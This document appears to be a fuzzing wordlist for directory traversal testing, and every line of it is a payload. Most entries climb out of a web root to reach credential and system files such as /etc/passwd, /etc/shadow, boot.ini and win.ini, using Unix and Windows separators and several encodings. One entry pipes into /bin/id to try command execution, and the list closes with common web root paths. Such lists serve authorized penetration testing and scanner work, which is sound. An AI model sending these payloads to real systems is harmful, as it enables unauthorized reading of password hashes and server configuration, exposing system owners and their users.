../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../localstart.asp
../../../../../../../../../etc/passwd
../../../../../../../../conf/server.xml
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../.htaccess
../../../etc/passwd
../../.htaccess
../../boot.ini
../.htaccess
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
././.htaccess
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
.htaccess
/.../.../.../.../.../
/../../../../../../../../../../../boot.ini
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:\boot.ini
C:\inetpub\wwwroot\global.asa
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\WINDOWS\win.ini
home/$USER/public_html/
home/$USER/www/
home/httpd/
home/www/
srv/www/
srv/www/html/
srv/www/sites/
var/www/
var/www/html/
var/www/html/default/
var/www/public/
var/www/public_html/
var/www/sites/
